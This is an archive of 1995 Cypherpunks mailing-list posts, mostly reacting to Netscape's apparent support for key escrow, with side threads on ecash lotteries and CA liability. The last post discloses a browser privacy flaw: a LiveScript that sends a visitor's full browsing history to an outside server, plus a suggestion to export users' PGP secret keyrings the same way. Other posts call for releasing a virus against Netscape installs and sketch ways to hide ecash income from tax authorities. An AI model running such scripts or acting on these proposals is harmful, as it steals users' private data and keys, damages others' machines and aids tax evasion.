From: aleph1 at dfw.net (Aleph One)
Date: Fri, 1 Dec 1995 09:11:10 +0800
Subject: Netscape gives in to key escrow
In-Reply-To: <199511300644.WAA02011@infinity.c2.org>
Message-ID: <Pine.SUN.3.91.951130010850.18600A-100000@dfw.net>


On Wed, 29 Nov 1995, sameer wrote:

> http://www.cnet.com/Central/News/govt.html
> 
> 	Bad. Very Bad. And I was almost starting to like Netscape.

Ahh well there goes my respect for netscape to. *sight*
Ahh well guess someone will just have to write a virus
to say enhance all escrow equiped version of netscape that come out.
Of course I dont have to point out to netscape we wont buy
any escrowed products from them. Hmmm Open Market is starting to
look better.

> -- 
> sameer						Voice:   510-601-9777
> Community ConneXion				FAX:     510-601-9734
> The Internet Privacy Provider			Dialin:  510-658-6376
> http://www.c2.org/ (or login as "guest")		sameer at c2.org
> 

Aleph One / aleph1 at dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 






From futplex at pseudonym.com  Thu Nov 30 17:12:40 1995
From: futplex at pseudonym.com (Futplex)
Date: Fri, 1 Dec 1995 09:12:40 +0800
Subject: Applied Cryptography Questions
In-Reply-To: <199511300614.HAA08769@utopia.hacktic.nl>
Message-ID: <199511300754.CAA12171@opine.cs.umass.edu>


Anonymous (hence the public reply) writes:
> A couple questions about Applied Cryptography (Second Edition)

I only have the 1st, but I won't consult it for this anyway....

> 1. What on earth is a Neural Net?

This sounds like a troll, since we recently had a thread about the possible
use of neural nets in cryptographic applications, and the precise text used
in AC2 to discuss this matter. Very roughly, a neural net is an abstract 
model of a network of neurons in a brain, used in artificial intelligence as
a model of computation. I imagine you could easily have found more complete
information by doing some trivial net search for "neural net".

> 2. Consider the Chinese Lottery attack vs a processor bank.
> 
>    ADVANTAGES
>      Distributed computing, no easy bombing target.
> 
>    DISADVANTAGES
>      39% inefficient
>      Need specialized hardware [for speed] or transmission of alogrithms
>        for any specific alogrithm
>      Not on all the time
>      If value(crack) * cracks/chip > cost of chip, then why not have
>        the gov buy the chips? Its probably cheaper that way.

Well, is it in fact "probably cheaper" ?  If value(crack) > cost(chip) >
cost(attack) then the attack makes more sense....

> 4. Does there exist an n such that a keyspace of 2^n is trivial to crack
>    [ie a matter of miniutes] on a PC but is difficult to crack for a 
>    big commercial company or even a major government? [this question
>    relates to Merkle's puzzles, when a 40-bit key seems a bit weak.]

I think you need to explain more for this question to make sense. Obviously
companies (even big ones) and governments (even major ones) could buy and use
PCs themselves, in the event that conferred some cryptanalytic advantage.

ObLycos: Hey, better still, let's put the archives in an export-controlled
directory. We don't want too many outsiders to hear about the privacy
advantages of strong cryptography, now do we ?

ObAlices: <yawn>

-Futplex <futplex at pseudonym.com>
"I look pretty young but I'm just backdated" -The Who





From Greg_Rose at sydney.sterling.com  Thu Nov 30 17:16:30 1995
From: Greg_Rose at sydney.sterling.com (Greg Rose)
Date: Fri, 1 Dec 1995 09:16:30 +0800
Subject: Q: Legal liability for Certification Authority
Message-ID: <pgpmoose.199512011139.6629@paganini.sydney.sterling.com>


In the last few weeks, mostly under the subject of
creating a Cypherpunks Certification Authority,
someone mentioned legal liability of a CA if a
certified identity was misused.

I am looking for material to pass on to a REAL,
PAID net-savvy lawyer relating to this question.
In return for the money we pay him, he will
return an opinion on just what liability exposure
would be for, say, a large technical users group
who got into the CA business for PGP keys. And/or
what disclaimers or indemnities would be needed.

I would be happy to make his legal opinion
available to the list. IANAL, so I don't know just
what precedents, decisions, regulations, and so on
might be relevent. More information is always a
good thing.

Please:

1. reply to me by mail, not the list, unless there
is more general relevence to Cypherpunks. I'll
summarise.

2. Speculation is not useful.

thanks,
Greg.

-- 
Greg Rose               INTERNET: greg_rose at sydney.sterling.com  
Sterling Software       VOICE:  +61-2-9975 4777    FAX:  +61-2-9975 2921
28 Rodborough Rd.       http://www.sydney.sterling.com:8080/~ggr/
French's Forest         35 0A 79 7D 5E 21 8D 47  E3 53 75 66 AC FB D9 45
NSW 2086 Australia.     co-mod sci.crypt.research, USENIX Director.





From jhupp at novellnet.gensys.com  Thu Nov 30 17:28:17 1995
From: jhupp at novellnet.gensys.com (Jeff Hupp)
Date: Fri, 1 Dec 1995 09:28:17 +0800
Subject: Netscape gives in to key escrow
Message-ID: <26C5DB002BF@Novellnet.Gensys.com>


On 30 Nov 95 at 13:30, Timothy C. May wrote:

: At 7:26 PM 11/30/95, Ravi Pandya wrote:
: >If you're looking for an alternative Web browser for Windows, we just made
: >ours available for free at www.netmanage.com. It's fast and reliable, and
: >supports HTML 3.0, inline video, software distribution, VRML (NT version),
: >Real Audio, TrueSpeech, etc.
: 
: This shows the price Netscape could pay for taking a pro-surveillance,
: anti-privacy stance.
: 

	The word is getting out.  Both brokers I have system support
	contracts with have called me asking for my take.
-- 
JHupp at gensys.com           |For PGP Public Key:
http://gensys.com          |finger jhupp at gensys.com
Waking a person unnecessarily should not be considered a capital crime.
For a first offence, that is






From ses at tipper.oit.unc.edu  Thu Nov 30 17:37:53 1995
From: ses at tipper.oit.unc.edu (Simon Spero)
Date: Fri, 1 Dec 1995 09:37:53 +0800
Subject: Netscape's Delicate Balancing Act
In-Reply-To: <ace375f6030210040b22@[205.199.118.202]>
Message-ID: <Pine.SOL.3.91.951130165549.1889D-100000@chivalry>



If anyone interested, I'm planning to  make up some T-Shirts featuring 
"The South Bay Url Company". 

Simon // Yes, we also do Tulips

---
(defun modexpt (x y n)  "computes (x^y) mod n"
  (cond ((= y 0) 1) 	((= y 1) (mod x n))
	((evenp y) (mod (expt (modexpt x (/ y 2) n) 2) n))
	(t (mod (* x (modexpt x (1- y) n)) n))))






From loki at obscura.com  Thu Nov 30 18:18:05 1995
From: loki at obscura.com (Lance Cottrell)
Date: Fri, 1 Dec 1995 10:18:05 +0800
Subject: Getting a copy of the Jim Clark speech
Message-ID: <ace40d4e0a021004aa99@[137.110.24.250]>


If he has not clarified his position by tomorrow evening, I will set up some
web pages explaining the situation and decrying Netscape's apparent
position on key escrow (GAK). I have the quotes that L. McCarthy posted,
and Jeff Weinstein's response. I have not been able to get the article off
the server yet (possible all the cypherpunks downloading it?). Any other
documents I should include?

        -Lance

At 1:24 PM 11/30/95, Jim Gillogly wrote:
>> Raph Levien <raph at c2.org> writes:
>> I called Netscape public relations. Here's what I found out:
>
>> 1. Netscape PR does not keep transcripts, etc., of Jim Clark's speeches.
>> 2. You can order a tape of the speech from Conference Copy for...
>
>Good initiative, but we needn't wait for 6 weeks to get a copy of it.
>All that needs to happen is for Jim Clark to explain what he meant, if
>it's different from what was reported.  No need for all the to-ing and
>fro-ing.
>
>Perhaps what he meant was simply reiterating the announcement of October
>when they said they'd support the TESSERA crypto API.  If it's worse than
>this, he should explain what's going on.  If not, October was the time to
>get excited rather than now.
>
>Waiting with bated breath...
>
>        Jim Gillogly
>        Highday, 10 Foreyule S.R. 1995, 21:24

----------------------------------------------------------
Lance Cottrell   loki at obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------







From aleph1 at dfw.net  Thu Nov 30 19:31:34 1995
From: aleph1 at dfw.net (Aleph One)
Date: Fri, 1 Dec 1995 11:31:34 +0800
Subject: Netscape gives in to key escrow
In-Reply-To: <199511300849.JAA13845@utopia.hacktic.nl>
Message-ID: <Pine.SUN.3.91.951130090706.26033A-100000@dfw.net>


On Thu, 30 Nov 1995, Anonymous wrote:

>       Aleph One's suggestion -- an NS-hack or "virus" -- doesn't make any
> sense: if Perry or someone would vet a hacked copy, I'd use it in a
> second. But hacking it would involve a violation of the license, so hacked
> versions couldn't be offered in any above-ground way: there'd be no way to
> certify a hacked copy with a trusted nym's key.

	You seem to have missed the point. A "virus" is not there to fix
your copy because you want it. Its there because I  want it. I would
be released so that infects all possible machines. It would either
remove the rutines in netsape that allow escrow or simple remove the 
offensive copy of netscape ( cant use it if its not there 8)
Violation of the license? really? Like virus writers give a damm.

>       Netscape is between a rock and a hard place: I think it's safe to
> say that, were all things equal, NS would support strong crypto. The fact
> that NS has decided otherwise suggests that some pressure was applied:
> Clark says as much. This leads me to believe that one possibly effective
> (and possibly dangerous) tactic might lie in a seriously sustained attack
> on NS's reputation -- keeping up a meme-drumbeat of "you can't trust
> Netscape, that's all, you'll get ripped off." I think we should try it --
> TODAY, now, persistently and loudly, until NS comes around. I'm not saying
> that this'll be enough, but it's a start. TODAY. And I really don't care
> what it takes: calling cronies in the press, spreading innuendo, redoing
> NS icon sets so there's a spy from "Spy Versus Spy" loitering behind the
> N... I've seen some nice "NO Netscape" tags on GNU-related pages. Let's do
> it.

	Yes and you must remember the power of the net. As an example remember
the heat Microsoft took for the Registration Wizard what all it does is 
ASK YOU if you would like to submit the recorded information about your 
computer to Microsoft. It was so blow out of proportion that it even made 
it to places that would check this kinda of stuff like Information Week.

> 
> Hieronymous
> FB DD B5 C8 FB F4 52 41  F0 0F A0 6E 99 43 75 06
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> 
> iQBVAwUBML1vc73g0mNE55u1AQGfdgIAsldR3e9UQZG9//38B9LrU/HnCSzaY1kB
> RMOcBdab5EZ2X9BXkA7lIdDJUUqHOykuv1oyFDtitWRsXxmaTb0cuw==
> =0FmD
> -----END PGP SIGNATURE-----
> 

Aleph One / aleph1 at dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 






From EALLENSMITH at ocelot.Rutgers.EDU  Thu Nov 30 20:10:49 1995
From: EALLENSMITH at ocelot.Rutgers.EDU (E. ALLEN SMITH)
Date: Fri, 1 Dec 1995 12:10:49 +0800
Subject: ecash lottery (Was: ecash casino)
Message-ID: <01HY9QKW4BCS8WYZVM@mbcl.rutgers.edu>


From:	IN%"s1113645 at tesla.cc.uottawa.ca" 30-NOV-1995 00:22:29.15

Isn't there also some Scandinavian bank that's handling ecash? It might be
hard to explain to US tax authorities how large amounts of anon currency
are ending up in one's marktwain account. In that case it might be 
-------------------
	There are essentially two things that one can do with tax-suspicious
ecash (or cash, for that matter). The first is to expend it in non-traceable,
non-predictable ways. The second is to disguise it so it looks
non-tax-suspicious.
	The first includes spending, of course. In regards to the
non-predictible, I am meaning avoiding spending it for things such as groceries
that someone can easily estimate a minimum bound for how much can be spent.
Spending it to add quality (such as low-fat foods) to those groceries would be
harder to prove.
	The first also includes charity and investment. Investment does have
the problem that the income one gets out will have to then be treated by the
same sort of process.
	The second will vary in method depending on one's individual skills
and situation. However, I will note that it will be easier for those with
independent earning skills- a self-owned business, for instance.
	I will note in regards to the above that while I have been doing some
reading on the underground/black economy, I have not actually attempted any
of the maneuvers discussed. Thus, what I say should be taken with at least a
grain of salt.
	-Allen





From anonymous-remailer at shell.portal.com  Thu Nov 30 20:18:42 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Fri, 1 Dec 1995 12:18:42 +0800
Subject: Netscape gives in to key escrow
Message-ID: <199512010321.TAA09577@jobe.shell.portal.com>


On Thu, 30 Nov 1995, Mike McNally wrote:
 
> Jeff Weinstein writes:
>  > have lots of stuff attributed to Jim, but very little of it is actual
>  > quotes.
> 
> Well, if there was in fact a speech made from which the pseudo-quotes
> in the article were taken, then surely the full text of that speech
> will be made available somewhere for clarification.

I read this article, and thought it to be quite a twist.  It's suicidal
from Netscape to say this. 

It's almost like a couple of stock promotions I was at yesterday at the
Calgary Petroleum Club.  Horrible nasty stuff.  Suicidal speeches. 
Especially the one guy from Neutrino Resources (an Oil and Gas Company)
who decided to explain what a Neutrino was before he started his "spiel"
and talking about how great his company was and how cashflow wasn't a good
measure of a company's worth.

Netscape could well learn from that.  (Unfortunately, I doubt that anyone
was there.) People in these audiences DO listen.  Press, investment
analysts, and the like who do pepper the audience didn't all just fall off
the turnip truck. 

Jim Clark, should have seen or heard this.  

If he did, then he might be a bit more careful with what he says ... but
then again, I'm not sure how involved he is in daily operations.  But
nothing that Netscape does any longer surprises this writer ... look at
how they handled the revelation back on Friday, October Thirteenth that
the emperor's product had no clothes. 

Did they respond to the claims??  No.  

All they did was spam this list with noise "unofficially, not speaking for
the company, but I work for Netscape" noise, and then continued
distributing their product.  Maybe these revelations will help to get the
Netscape product pulled from people's machines, but I'm not gonna hold my
breath on that one. 

The momentum which is behind their stock and product promotion now has a 
life of its own.  Stopping Netscape (and the stock from advancing) is 
like trying to stop a steam-roller.

But for now, I'm busy setting up an email account to allow people to send
replies to me, and to settle this "reputation" stuff once and for all.  

I should be back to posting very soon. 




Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.

> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> | Nobody's going to listen to you if you just | Mike McNally (m5 at tivoli.com) |
> | stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> 






From EALLENSMITH at ocelot.Rutgers.EDU  Thu Nov 30 20:29:13 1995
From: EALLENSMITH at ocelot.Rutgers.EDU (E. ALLEN SMITH)
Date: Fri, 1 Dec 1995 12:29:13 +0800
Subject: Getting a copy of the Jim Clark speech
Message-ID: <01HY9R3NKBII8WYZVM@mbcl.rutgers.edu>


From:	IN%"loki at obscura.com" 30-NOV-1995 21:12:15.86

If he has not clarified his position by tomorrow evening, I will set up some
web pages explaining the situation and decrying Netscape's apparent
position on key escrow (GAK). I have the quotes that L. McCarthy posted,
and Jeff Weinstein's response. I have not been able to get the article off
the server yet (possible all the cypherpunks downloading it?). Any other
documents I should include?
---------
	I would suggest being sure to include some links to the EFF archives
in regards to Clipper, etcetera. These should make it clear that it isn't just
one group opposing the idea of GAK, but a wide coalition.
	-Allen





From crypto at midex.com  Thu Nov 30 20:30:29 1995
From: crypto at midex.com (Matt Miszewski)
Date: Fri, 1 Dec 1995 12:30:29 +0800
Subject: Netscape gives in to key escrow
In-Reply-To: <199511301616.IAA18452@infinity.c2.org>
Message-ID: <Pine.3.89.9512010401.A6882-0100000@shaq.midex.com>


On Thu, 30 Nov 1995, sameer wrote:

> 	Jeff: If Netscape comes out in favor of GAK, will you leave?
> (Wait until February, at least, of course..) You don't have to answer
> that to me, or the list, just think about it, and answer it for
> yourself.  Do you think "anyone else" there would leave, as you say
> below that they don't want to go down history, etc...
> 

While this would go over well in the press if handled right please let 
everyone remember that Jeff is a real person with bills to pay and food 
to put on at least his own table.  Now if someone out there with their 
own business is willing to match his politics with his purse and offer 
Jeff a job at the same level if he *decides* to leave in the midst of GAK 
flak...

> 
> -- 
> sameer						Voice:   510-601-9777
> Community ConneXion				FAX:     510-601-9734
> The Internet Privacy Provider			Dialin:  510-658-6376
> http://www.c2.org/ (or login as "guest")		sameer at c2.org
> 

Matt





From anonymous-remailer at shell.portal.com  Thu Nov 30 20:35:26 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Fri, 1 Dec 1995 12:35:26 +0800
Subject: Netscape gives in to key escrow
Message-ID: <199512010335.TAA10408@jobe.shell.portal.com>


On Thu, 30 Nov 1995, Jay Holovacs wrote:

> On Thu, 30 Nov 1995, Timothy C. May wrote:
> 
> > Can Netscape continue to prosper? This latest issue won't kill it,
> 
> I suspect this will unfortunately help. Stockholders are interested in 
> profits, not principles. 

Uhhm, I think that that depends on what "class" of stockholder you're
speaking of.  The short term "trader" whose idea of a long-term investment
is the one that gives a decent return by lunchtime, or the one who wants
to buy a good company, make a solid investment, and put their stock away
for five years, knowing that their capital is being put to good use. 

They really are different players with different approaches.

Netscape stock as an example has lots of momentum ... it's in a feeding 
frenzy.  And I'm pretty sure that someone with "very" deep pockets -- 
possibly even someone who's got their own printing press -- is busily
buying everything in sight, and crossing trades on every up-tick.

(Disclaimer: Just my opinion, not speaking officically in any capacity.)

I'm not sure who might be behind any of this, though.  I haven't the
desktop power, nor the data or tool-set to chart and flow-analyze the
trading record, and see what the play is.)

I wouldn't really be surprised though if it was offshore interests who
want to "cash-in" on high-tech.  Standard "Von Clausewitz" reader-types. 
People who subscribe to "Von Clausewitz's" principles on "other means". 

I base this assessment purely on price-movement, and on the "known" 
fundamentals.  To this writer, it's pretty transparent.  

In the last six-weeks, Netscape has gone from the 60's to flirting with
150. That's one heck of a trend-line that some pseudo-technical
floor-trader types will jump on. 

Part of that is "market-forces", and part of that is definitely
"market-makers". 

The only way to counteract that is probably some Elliott Wave Theory
shakeout, or something similar.  It's the only way to stop 'em from
blowing up the balloon.  Or you need one killer scandal. 

Cheap advice, btw ... it's free ... and no-one even had to buy me a Gin &
Tonic, or some fancy canapes to hear it. 



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.








From fstuart at vetmed.auburn.edu  Thu Nov 30 20:36:30 1995
From: fstuart at vetmed.auburn.edu (Frank Stuart)
Date: Fri, 1 Dec 1995 12:36:30 +0800
Subject: Getting a copy of the Jim Clark speech
Message-ID: <199512010343.VAA26254@snoopy.vetmed.auburn.edu>


>If he has not clarified his position by tomorrow evening, I will set up some
>web pages explaining the situation and decrying Netscape's apparent
>position on key escrow (GAK). I have the quotes that L. McCarthy posted,
>and Jeff Weinstein's response. I have not been able to get the article off
>the server yet (possible all the cypherpunks downloading it?). Any other
>documents I should include?

I'm working on an "obnoxify" program to convert normal html documents into
documents that look normal to non-netscape browsers, but are too painful to
read with netscape (</BLINK>, <FONT SIZE=1>, etc.).  I think tomorrow evening
would be a good time to decide whether or not to distribute it.


                          | (Douglas) Hofstadter's Law:
Frank Stuart              | It always takes longer than you expect, even 
fstuart at vetmed.auburn.edu | when you take into account Hofstadter's Law.





From adam at lighthouse.homeport.org  Thu Nov 30 20:47:27 1995
From: adam at lighthouse.homeport.org (Adam Shostack)
Date: Fri, 1 Dec 1995 12:47:27 +0800
Subject: Netscape gives in to key escrow
In-Reply-To: <Pine.3.89.9511300825.A27268-0100000@styx.ios.com>
Message-ID: <199512010307.WAA18467@homeport.org>


Jay Holovacs wrote:
| On Thu, 30 Nov 1995, Timothy C. May wrote:

| > Can Netscape continue to prosper? This latest issue won't kill it,
| 
| I suspect this will unfortunately help. Stockholders are interested in 
| profits, not principles. Co-oping with the feds will help Netscape get to 
| the commercial market sooner, and most customers, sadly don't give a damn 
| about privacy (or don't understand).

	Thats very true.  We should look at what stockholders tend to
care about (although, in the case of many internet stocks, it does
seem to be 'a bigger fool').

	One thing that stockholders do care about is liability.  Its
my (non lawyerly) opinion that anyone implementing GAK without a
government mandate to do so is opening themselves up to huge liability
the Clipper database of keys gets out.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From rah at shipwright.com  Thu Nov 30 20:52:47 1995
From: rah at shipwright.com (Robert Hettinga)
Date: Fri, 1 Dec 1995 12:52:47 +0800
Subject: (fwd) ECheques
Message-ID: <v02120d4cace424453e03@[199.0.65.105]>



--- begin forwarded text

From: "John Hemming CEO MarketNet"  <JohnHemming at mkn.co.uk>
Date:  Thu, 30 Nov 1995 17:11:34 PM PST
To: www-buyinfo at allegra.att.com
Mime-Version: 1.0
Subject: ECheques

We have just had the final modifications of the documentation from our
Lawyers to make the UK Sterling Clearing ECheque system fully live.

If you want to peruse the process

http://mkn.co.uk/bank - about opening accounts
http://mkn.co.uk/help/bank/register - account contract
http://mkn.co.uk/help/bank/regkey - registering each key mandate

We do intend putting some form of PGP signature checking facility
in for clearing ECheques later, but for the moment the standard ECheque
form generated by WorkHorse is what we accept.

The Standard ECheque is nothing more than a BER encoded sequence
similar to a certificate request with a standard PKCS signature at the end
of it which is then Base64 encoded (but if you use the decoding
facilities in WorkHorse you can see this).

Britain .... first again.

We did clear an ECheque in September, but this is now the real McCoy.
Merchant accounts cost nothing to open and the transactional charge
for a Merchant to receive Sterling (not ecash denominated in Sterling)
is 1%.  The accounts can be reviewed online and they are real bank
accounts (in Sterling however).  Other Merchant transactions are costed
as usual see conditions (eg 40p per cheque - paper cheque).

If you want to integrate ECheques and the web simply see our flower
ordering form http://mkn.co.uk/load/ordflow

John
--- end forwarded text


-----------------
Robert Hettinga (rah at shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/
>>>>Phree Phil: Email: zldf at clark.net  http://www.netresponse.com/zldf <<<<<







From stewarts at ix.netcom.com  Thu Nov 30 20:53:05 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Fri, 1 Dec 1995 12:53:05 +0800
Subject: ecash lottery (Was: ecash casino)
Message-ID: <199512010309.TAA10065@ix4.ix.netcom.com>


Ian wrote:
>>The idea behind my proposal was that any participant can determine if he has
>>won.  The winning number (a hash of which was published beforehand, as in
>>a "bit commitment" scheme) is announced.  Anyone who picked a number
>>that, say, matched in the last digit, wins $2.  If you matched the
>>last two digits, you win $10, etc.  The house (without sacrificing
>>reputation) can't arrange who the big payoffs will go to, nor can it
>>(as I think Tim suggested) give out lots of small prizes and no big ones.

>There are two main kinds of lotteries - systems where many people have a 
>moderate chance of winning a fixed amount of money, and lotto-systems where
the winners split a jackpot that's based on current and/or previous players' 
losses\\\\\\ ticket purchases.  The former kind, such as numbers games,
works because the expected payoff is less than the ticket price -
you can make it honest through techniques like bit committment,
but as Tim points out, the kind of people who care about things like
bit committment know enough math to know these games are money-losers.
Perhaps you can attract some people with a flashy user interface,
but it's not like really being in Vegas with booze and babes and blinkenlights
and incessant noise and stale smoke and Siegfried and Roy's tiger act.

On the other hand, lotto systems are too easy to cheat with anonymous payees.
Sure, you can make sure that any genuine winners get paid, 
but you can also throw in the occasional ringer to share the prize,
and nobody can tell unless you do it often enough that people start checking
the probabilities.  Bit committment doesn't prevent this kind of cheating;
it just verifies that you knew the number in advance (oops :-).

You need some sort of externally verifiable source of random numbers;
an MD5 hash of the Wall Street Journal stock price web page from
a few hours after the last bet and digital timestamping or something
might be good enough.  (Of course, a single unified stock price page
becomes even less meaningful with large volumes of on-line anonymous private
stock trading.)

(The pre-digital version of this scam was to hire some poor old grandma from the
South Bronx as the shill, since nobody'd accuse Granny of conspiring with
the mob.
It wasn't really enough then, and now Granny may be using anonymous digicash
for her payoffs...)

Another way to cheat progressive lotto systems is to not report all
your ticket sales each week, since anonymity makes it excessively hard
to verify.  Committing to the list of all the numbers bet almost works,
but you could still skim a few percent by reporting smaller sales of
popularly chosen numbers, with the risk that you've occasionally got to
pay all six real winners 1/5 of the jackpot if you're unlucky.
You can't get around this by using large enough numbers that there's
a small probability of duplication, because that also reduces the 
probability of a win too far, and because some folks are going to pick
7777777...777 regardless of how many bits long their bet is.

Government lotteries are surprisingly free from this sort of problem.
Not because governments are excessively honest, of course :-)
Employee pay isn't generally dependent on profitability, 
there's enough public scrutiny that it's harder for employees to cheat
for their own gain (rather than their lotto organizations'),
and (perhaps most important) they're already taking such an appallingly
high cut of the winnings that there's no need for regular cheating -
it's one of the efficiencies possible in a highly unnatural monopoly.

But if all else fails, you might be able to talk Scott Adams into giving
you the World Wide Web franchise for Dogbert's Value-Priced Lottery Tickets..

#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281







From llurch at networking.stanford.edu  Thu Nov 30 22:04:23 1995
From: llurch at networking.stanford.edu (Rich Graves)
Date: Fri, 1 Dec 1995 14:04:23 +0800
Subject: Netscape 2.0b2 allows for invasion of privacy (fwd)
In-Reply-To: <Pine.SGI.3.90.951201155131.15809A-100000@chem2.chem.swin.edu.au>
Message-ID: <Pine.ULT.3.91.951130212409.28316B-100000@Networking.Stanford.EDU>


[As seen on the cypherpunks list]

I just confirmed this for Mozilla/2.0b3 (Win95; I). I also see an entry 
from the Mac version of 2.0b3. No need for anyone else to test it. 

Very nasty indeed. To what other variables might someone have access?

Scott is probably going to be responsible for a good bit of the traffic 
on the trans-pacific cables tomorrow :-)

-rich





From jamesd at echeque.com  Thu Nov 30 22:09:44 1995
From: jamesd at echeque.com (James A. Donald)
Date: Fri, 1 Dec 1995 14:09:44 +0800
Subject: WTO an even worse possibility as Inet regulator
Message-ID: <199512010519.VAA12922@blob.best.net>


At 08:40 PM 11/30/95 +0000, attila wrote:
>	<attila sez>  but WTO is also accumulating a rather larger 
>    bureaucracy and is challeng Uncle Sam on severl major unilateral
>    actions.  [...] and it will be by the WTOs and world courts, or the
>    Rockefeller NWO --read UN, and UN troops in America. 

This is excessively paranoid:  The main threat to freedom is still
internal, rather than external.

The major expansion of WTO power came because of the notorious
corruption and one sidedness of American courts judging disputes
between foreign and American businessmen.

Since WTO courts do not have WTO gunmen this amounts to a major
separation of judicial and executive power, thus though it is
a centralizing move, it is also a move that favors liberty an
the rule of law.

Of course the first stages in centralization always do, at first,
favor liberty and the rule of law as they restrain corrupt and
lawless local powers.  Later, much later, the centralized power
becomes a greater threat to liberty than those local authorities
that it restrained.  

That stage is still a long way down the track, and very likely 
the modern nation state will collapse first.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd at echeque.com






From tcmay at got.net  Thu Nov 30 22:12:32 1995
From: tcmay at got.net (Timothy C. May)
Date: Fri, 1 Dec 1995 14:12:32 +0800
Subject: Netscape, Corporations, and GAK Support
Message-ID: <ace330c90e0210045e96@[205.199.118.202]>



The firestorm of criticisms of Netscape and Jim Clark over his apparent
support for mandated key escrow (GAK, "Government Access to Keys," Carl
Ellison) raises some issues:

1. To what extent is the government and its supporters of GAK applying
pressure to corporations and/or giving them private briefings on security
issues?

(Recall the infamous "If you knew what I knew, you'd support Clipper" sorts
of comments from people who'd apparently been glimpses of the Four Horsemen
riding in.)

2. What is the appropriate response for folks like us when it becomes
apparent that a corporation with a tremendous influence on future
directions in security and privacy (examples being both Microsoft and
Netscape) have apparently been jaw-boned in private on security issues?

(I tend to use "apparently" and "ostensibly" a lot, as you've probably
noticed. It's my way of signalling some uncertainty. The history of GAK has
indicated to me that discussions are happening in private with CEOs and
suchlike, else why or how could some of the public comments come out the
way they do? But I don't know this for a fact--a side effect of private
channels, ironically--so I can only call 'em as I "apparently" see 'em.)

Supporters of corporations, motivated by a range of reasons, often ask
critics to "hold off" on criticisms until firmer statements of policy are
made, or until actual products are introduced.

Alas, this is a bad strategy for us to follow. The very nature of the
behind-the-scenes manouvering, and the long lead times for products, means
that we must be alert for "early warning signals" of impending GAK and
other totalitarian measures.

I personally believe that the government supporters of mandated key escrow
and other restrictions on the use of encryption have looked at the
explosive growth of the Web in general and of Netscape in particular and
are *frantically* looking for ways to get a handle on the issues that
motivate them. As others have speculated, putting GAK into every Netscape
_server_ would have certain advantages, and I would be very surprised
indeed if NSA/NIST/Denning have not been thinking about this issue.

(Ray Cromwell says it can be skirted...I don't doubt this, just as
superencryption can skirt GAK in machine-to-machine e-mail. But this
doesn't mean that we should just ignore signs that GAK may be built into
Netscape, or other products.)

It's possible that Jim Clark--whose quotations I have not yet seen denied
by Netscape--is merely naive on matters of mandated key escrow. It's
possible that he hasn't given it much thought. It's also possible that he
sincerely is supportive of plans for Big Brother to have an "escrowed" copy
of our conversations, diaries, travel plans, etc.

I don't know, and I hope we soon hear more from Jim Clark on this issue.
But I will always think it appropriate to listen carefully for evidence
that a company plans to help build the Surveillance State, and to act in
response to such evidence.

The stakes are just too high to "wait for an actual product" before
speaking out.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From adam at lighthouse.homeport.org  Thu Nov 30 22:20:08 1995
From: adam at lighthouse.homeport.org (Adam Shostack)
Date: Fri, 1 Dec 1995 14:20:08 +0800
Subject: Netscape 2.0b2 allows for invasion of privacy (fwd)
In-Reply-To: <Pine.SGI.3.90.951201155131.15809A-100000@chem2.chem.swin.edu.au>
Message-ID: <199512010605.BAA18775@homeport.org>


	About a month ago, I made the argument that Java, despite its
imperfections, is much better than most things we'll see.  I stand by
this argument, and urge Netscape to use only Java* as a scripting
language.

	*By Java, I mean the class of languages designed with security
in mind.  I think that means Java and Safe-TCL.  Taint-perl is not
useful; its designed for unsafe input from a user, not unsafe code.

	People with time to hack netscape might experiment with
location.href = "file://.pgp/secring.pgp" and see if you can write a
script to export it somewhere.

And here's how its done.  Hitting the page makes your history public
knowledge.  (Btw, Bal, is Netbsd1.1 stable yet? :)

scott at tripleg.com.au wrote this code:

<SCRIPT LANGUAGE="LiveScript">

<!--
  i = 0
  yourHistory = ""
  while (i < history.length) { 
    yourHistory += history[i]
    i++;
    if (i < history.length) yourHistory += "^"
  }
  location.href = "http://www.tripleg.com.au/cgi-bin/scott/his?"+yourHistory
<!-- hahah here is the hidden script -->


Graeme Cross wrote:
| >From: Scott Weston <scott at tripleg.com.au>
| >The "LiveScript" that I wrote extracts ALL the history of the current
| >netscape window.  By history I mean ALL the pages that you have visited
